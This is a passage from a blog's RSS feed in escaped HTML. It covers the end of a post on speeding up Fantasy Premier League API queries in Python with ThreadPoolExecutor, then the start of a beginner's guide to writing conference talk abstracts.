&lt;p&gt;For this blog I will be going with &lt;code&gt;concurrent.futures.ThreadPoolExecutor&lt;/code&gt; as it integrates nicely with my
existing code and the bigger gains from &lt;code&gt;asyncio&lt;/code&gt; won&amp;rsquo;t really suit my use case.&lt;/p&gt;
&lt;p&gt;The first thing I need to do (which could&amp;rsquo;ve been done earlier) is extract the per player logic to a separate function.
This function will take a players details then use the player ID to query the API and grab the players season data. It
will then nicely return it as a DataFrame.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;get_player_data&lt;/span&gt;(player_info, api_url):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;&amp;#34;&amp;#34;Fetch data for a single player and return as DataFrame&amp;#34;&amp;#34;&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; player_id &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; player_info[&lt;span style="color:#a5d6ff"&gt;&amp;#39;entry&amp;#39;&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; player_name &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; player_info[&lt;span style="color:#a5d6ff"&gt;&amp;#39;player_name&amp;#39;&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; team_name &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; player_info[&lt;span style="color:#a5d6ff"&gt;&amp;#39;entry_name&amp;#39;&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; player_query &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; api_url &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;entry/&amp;#34;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; str(player_id) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;/history&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; player_response &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; requests&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;get(player_query)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; player_data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; json&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;loads(player_response&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;text)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# Create DataFrame for this player&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; player_df &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;DataFrame({
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;name&amp;#39;&lt;/span&gt;: player_name,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;team_name&amp;#39;&lt;/span&gt;: team_name,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;event&amp;#39;&lt;/span&gt;: pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;json_normalize(player_data[&lt;span style="color:#a5d6ff"&gt;&amp;#39;current&amp;#39;&lt;/span&gt;])[&lt;span style="color:#a5d6ff"&gt;&amp;#39;event&amp;#39;&lt;/span&gt;],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;points&amp;#39;&lt;/span&gt;: pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;json_normalize(player_data[&lt;span style="color:#a5d6ff"&gt;&amp;#39;current&amp;#39;&lt;/span&gt;])[&lt;span style="color:#a5d6ff"&gt;&amp;#39;total_points&amp;#39;&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; })
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; player_df
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;I will also need to adapt how I iterate over the player data. I know I&amp;rsquo;ve already switched from &lt;code&gt;iterrows&lt;/code&gt; to
a for loop over a zip of the relevant data but, then new function will use a different method of iteration. So
I am creating a &amp;lsquo;records&amp;rsquo; dictionary of the relevant data which I can then pass directly to my new &lt;code&gt;get_player_data&lt;/code&gt;
function.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;players &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; league[[&lt;span style="color:#a5d6ff"&gt;&amp;#39;entry&amp;#39;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#39;player_name&amp;#39;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#39;entry_name&amp;#39;&lt;/span&gt;]]&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;to_dict(&lt;span style="color:#a5d6ff"&gt;&amp;#39;records&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Next comes the &lt;code&gt;ThreadPoolExecutor&lt;/code&gt;, this is what allows us to run multiple API calls at once. It allows
to create and send code to other Python threads (workers). I will first initialise an empty list to
write my player dataframes to. Then I&amp;rsquo;ll use &lt;code&gt;ThreadPoolExecutor(max_workers=10)&lt;/code&gt; to create 10 workers
that we can send code to (I am using 10 as an example, this will be an argument the user can change in
the final function). &lt;code&gt;exector&lt;/code&gt; is the object used to send code to the new workers, I can use &lt;code&gt;executor.map&lt;/code&gt;
to map &lt;code&gt;get_player_data&lt;/code&gt; over the &lt;code&gt;players&lt;/code&gt; dictionary and save the output to our initialised list.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;concurrent.futures&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; ThreadPoolExecutor
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;get_season_league&lt;/span&gt;(league_id &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;485842&amp;#34;&lt;/span&gt;):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# ...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; player_dfs &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; []
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;with&lt;/span&gt; ThreadPoolExecutor(max_workers&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;10&lt;/span&gt;) &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; executor:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; results &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; executor&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;map(get_player_data, players)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; player_dfs &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; list(results)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Finally we use the change mentioned above of using a single &lt;code&gt;pd.concat&lt;/code&gt; so we only run it once rather than
n many times.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;df &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;concat(player_dfs, ignore_index&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#79c0ff"&gt;True&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;So our final functions will look like this, with &lt;code&gt;get_player_data&lt;/code&gt; defined inside &lt;code&gt;get_season_league&lt;/code&gt; so
the &lt;code&gt;api_url&lt;/code&gt; is available:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;get_season_league&lt;/span&gt;(league_id&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;485842&amp;#34;&lt;/span&gt;, max_workers&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;10&lt;/span&gt;):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; api_url &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;https://fantasy.premierleague.com/api/&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; url &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; api_url &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;leagues-classic/&amp;#34;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; league_id &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;/standings/&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; response &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; requests&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;get(url)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; json&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;loads(response&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;text)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; league &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;DataFrame(data[&lt;span style="color:#a5d6ff"&gt;&amp;#39;standings&amp;#39;&lt;/span&gt;][&lt;span style="color:#a5d6ff"&gt;&amp;#39;results&amp;#39;&lt;/span&gt;])
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;get_player_data&lt;/span&gt;(player_info):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;&amp;#34;&amp;#34;Fetch data for a single player and return as DataFrame&amp;#34;&amp;#34;&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; player_id &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; player_info[&lt;span style="color:#a5d6ff"&gt;&amp;#39;entry&amp;#39;&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; player_name &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; player_info[&lt;span style="color:#a5d6ff"&gt;&amp;#39;player_name&amp;#39;&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; team_name &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; player_info[&lt;span style="color:#a5d6ff"&gt;&amp;#39;entry_name&amp;#39;&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; player_query &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; api_url &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;entry/&amp;#34;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; str(player_id) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;/history&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; player_response &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; requests&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;get(player_query)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; player_data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; json&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;loads(player_response&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;text)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# Create DataFrame for this player&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; player_df &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;DataFrame({
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;name&amp;#39;&lt;/span&gt;: player_name,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;team_name&amp;#39;&lt;/span&gt;: team_name,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;event&amp;#39;&lt;/span&gt;: pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;json_normalize(player_data[&lt;span style="color:#a5d6ff"&gt;&amp;#39;current&amp;#39;&lt;/span&gt;])[&lt;span style="color:#a5d6ff"&gt;&amp;#39;event&amp;#39;&lt;/span&gt;],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;points&amp;#39;&lt;/span&gt;: pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;json_normalize(player_data[&lt;span style="color:#a5d6ff"&gt;&amp;#39;current&amp;#39;&lt;/span&gt;])[&lt;span style="color:#a5d6ff"&gt;&amp;#39;total_points&amp;#39;&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; })
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; player_df
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; players &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; league[[&lt;span style="color:#a5d6ff"&gt;&amp;#39;entry&amp;#39;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#39;player_name&amp;#39;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#39;entry_name&amp;#39;&lt;/span&gt;]]&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;to_dict(&lt;span style="color:#a5d6ff"&gt;&amp;#39;records&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; player_dfs &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; []
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;with&lt;/span&gt; ThreadPoolExecutor(max_workers&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;max_workers) &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; executor:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; results &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; executor&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;map(get_player_data, players)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; player_dfs &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; list(results)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; df &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;concat(player_dfs, ignore_index&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#79c0ff"&gt;True&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; df
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;When I run the function on the league of 50, it now takes ~1.5 seconds rather than the original ~13 seconds.&lt;/p&gt;
&lt;h2 id="summary"&gt;Summary&lt;/h2&gt;
&lt;p&gt;So we&amp;rsquo;ve optimised the function to a good degree using a few adjustments to the orginial function, then using multiple
threads to run API calls at the same time. There is still some things left on the table like using &lt;code&gt;asyncio&lt;/code&gt;
instead or even &lt;code&gt;executor.submit()&lt;/code&gt; to have more control of the individual player queries (handling errors etc). So
perhaps in a future blog we will look at speeding the function up a little bit more.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/python-package-part-three/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Beginner’s Guide to Submitting Conference Abstracts</title><link>https://www.jumpingrivers.com/blog/beginners-guide-conference-abstracts/</link><pubDate>Tue, 02 Dec 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/beginners-guide-conference-abstracts/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/beginners-guide-conference-abstracts/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/beginners-guide-conference-abstracts/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Submitting a conference abstract can feel intimidating, especially if it
is your first time. Most people worry about whether their topic is good
enough, whether their experience is &amp;ldquo;senior enough&amp;rdquo;, or if they are even
writing the abstract the &amp;ldquo;right&amp;rdquo; way.&lt;/p&gt;
&lt;p&gt;The truth is that most conferences want a wide range of voices.
Organisers want speakers who can explain something clearly, not speakers
with the fanciest job titles. This guide will walk you through:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;what an abstract is&lt;/li&gt;
&lt;li&gt;how to write one&lt;/li&gt;
&lt;li&gt;what reviewers look for&lt;/li&gt;
&lt;li&gt;where you can submit your first talk&lt;/li&gt;
&lt;/ul&gt;
&lt;blockquote&gt;
&lt;p&gt;If you are looking for a place to start, we are accepting submissions
for &lt;a href="https://ai-in-production.jumpingrivers.com/" rel="external"&gt;&lt;strong&gt;AI in Production
2026&lt;/strong&gt;&lt;/a&gt; until &lt;strong&gt;23
January&lt;/strong&gt;. More details are at the end of this post.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="what-is-a-conference-abstract"&gt;What is a conference abstract?&lt;/h2&gt;
&lt;p&gt;An &lt;strong&gt;abstract&lt;/strong&gt; is a short summary of what you want to talk about. It
tells reviewers:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;what the topic is&lt;/li&gt;
&lt;li&gt;why it matters&lt;/li&gt;
&lt;li&gt;what the audience will learn&lt;/li&gt;
&lt;li&gt;how you plan to deliver it&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;It does not need to be perfect prose. It just needs to be &lt;strong&gt;clear&lt;/strong&gt;.&lt;/p&gt;
&lt;h2 id="you-are-qualified-to-speak-yes-you"&gt;You are qualified to speak (yes, you)&lt;/h2&gt;
&lt;p&gt;You do not have to be the world’s leading expert on something to speak
about it. Some of the best talks come from people explaining what they
learned while building, fixing, or reviewing a system.&lt;/p&gt;
&lt;p&gt;Choose something you understand well enough to explain without jargon.
For example:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;a project you worked on&lt;/li&gt;
&lt;li&gt;a problem your team solved&lt;/li&gt;
&lt;li&gt;a lesson you learned along the way&lt;/li&gt;
&lt;li&gt;a method, tool, or approach you wish you had known sooner&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;If you can explain the &lt;strong&gt;why we did it&lt;/strong&gt; and &lt;strong&gt;what we discovered&lt;/strong&gt;, you
have a potential talk.&lt;/p&gt;
&lt;p&gt;Conferences welcome new speakers. You only need:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;something useful to explain&lt;/li&gt;
&lt;li&gt;a clear abstract&lt;/li&gt;
&lt;li&gt;willingness to share your experience&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;If you have never spoken before, say so. Reviewers appreciate honesty
and fresh perspectives.&lt;/p&gt;
&lt;h2 id="how-to-write-your-abstract"&gt;How to write your abstract&lt;/h2&gt;
&lt;p&gt;Most conferences ask for around 200 to 250 words. Some ask for even
less. Here is a simple structure that works.&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Set the context&lt;/strong&gt;&lt;br&gt;
One sentence that explains the setting or problem.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Explain what you did&lt;/strong&gt;&lt;br&gt;
Was it a system you built, a model you deployed, or an analysis you
improved?&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Highlight what the audience will learn&lt;/strong&gt;&lt;br&gt;
Reviewers want to know what people will take away.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Keep the language clear&lt;/strong&gt;&lt;br&gt;
Avoid buzzwords and complicated claims. Good abstracts are
straightforward.&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h3 id="a-short-example"&gt;A short example&lt;/h3&gt;
&lt;blockquote&gt;
&lt;p&gt;Our team needed a way to monitor model drift across multiple
deployments. I will share the steps we took, the checks we added, and
the mistakes we made on the way. Attendees will leave with practical
checks they can add to their own model monitoring process.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;You can adapt this pattern for your own work:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;one sentence for the problem&lt;/li&gt;
&lt;li&gt;one or two sentences for what you did&lt;/li&gt;
&lt;li&gt;one sentence for what people will learn&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="practical-tips"&gt;Practical tips&lt;/h2&gt;
&lt;h3 id="choose-your-format"&gt;Choose your format&lt;/h3&gt;
&lt;p&gt;Most conferences offer at least two formats:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Lightning talks&lt;/strong&gt; (around 5 to 6 minutes)&lt;br&gt;
Good for one focused idea, a small tool, or a single lesson.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Standard talks&lt;/strong&gt; (around 20 to 25 minutes)&lt;br&gt;
Better for a full story that includes context, process, and
outcomes.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;If you are unsure which to pick, choose the standard slot. Reviewers
often adjust formats based on the strength of the topic.&lt;/p&gt;
&lt;h3 id="show-who-benefits"&gt;Show who benefits&lt;/h3&gt;
&lt;p&gt;At the end of your abstract, add a simple sentence such as:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&amp;ldquo;This talk is suited for engineers working with deployment and
monitoring.&amp;rdquo;&lt;/li&gt;
&lt;li&gt;&amp;ldquo;This talk will help data scientists who want a clearer approach to
evaluation.&amp;rdquo;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;This makes it easier for reviewers to place your talk in the programme
and helps attendees decide whether it is relevant for them.&lt;/p&gt;
&lt;h2 id="what-reviewers-look-for"&gt;What reviewers look for&lt;/h2&gt;
&lt;p&gt;Reviewers often focus on three questions.&lt;/p&gt;
&lt;h3 id="is-the-topic-clear"&gt;Is the topic clear?&lt;/h3&gt;
&lt;p&gt;Can they understand what you are talking about &lt;strong&gt;without&lt;/strong&gt; insider
knowledge of your company or project?&lt;/p&gt;
&lt;p&gt;Avoid internal code names or acronyms only your team uses.&lt;/p&gt;
&lt;h3 id="will-the-audience-learn-something-useful"&gt;Will the audience learn something useful?&lt;/h3&gt;
&lt;p&gt;Strong abstracts make it obvious what attendees will take away. They
often include:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;concrete examples&lt;/li&gt;
&lt;li&gt;specific techniques or tools&lt;/li&gt;
&lt;li&gt;clear lessons learned&lt;/li&gt;
&lt;/ul&gt;
